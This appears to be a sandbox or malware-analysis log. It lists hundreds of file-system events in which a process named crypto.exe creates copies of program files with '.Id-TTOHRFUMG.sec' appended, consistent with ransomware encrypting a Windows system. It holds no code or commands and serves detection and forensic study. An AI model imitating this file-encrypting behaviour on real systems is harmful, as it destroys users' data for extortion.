File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21370_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ku-ckb.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libchorus_flanger_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21520_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SAFRI_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR11F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\IPM.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Traditional.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePageStyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageSlice.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199805.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\POST98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libgradient_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233992.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183290.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSRuntimeUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14871_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00268_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLINTL32.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SlateBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\PDIALOG.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\WMPSideShowGadget.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CharSetTable.chr.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18197_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SWEST_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099177.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\css\cpu.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00017_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14828_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21434_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MCPS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\content-types.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02288_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Composite.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Tasks.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\en-US\WinMail.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_sse2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215709.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239935.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHDHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libpuzzle_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\javafx-font.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02124_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\prism-d3d.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0090070.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART8.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\MeetingIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyMergeLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07804_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02093_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLMACRO.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OFFOWCI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ca.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\ACT3.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\DLGSETP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OMSXP32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\.lastModified.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153398.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_mid.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\clock.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORM.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR9F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBEMAIL.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALSO98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00352_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\TestUpdate.MTS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\slideshow_glass_frame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Miquelon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME12.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BIB.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\eo.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_en.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\oisctrl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextService.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NPAUTHZ.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01747_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml.Id-TTOHRFUMG.sec	crypto.exe
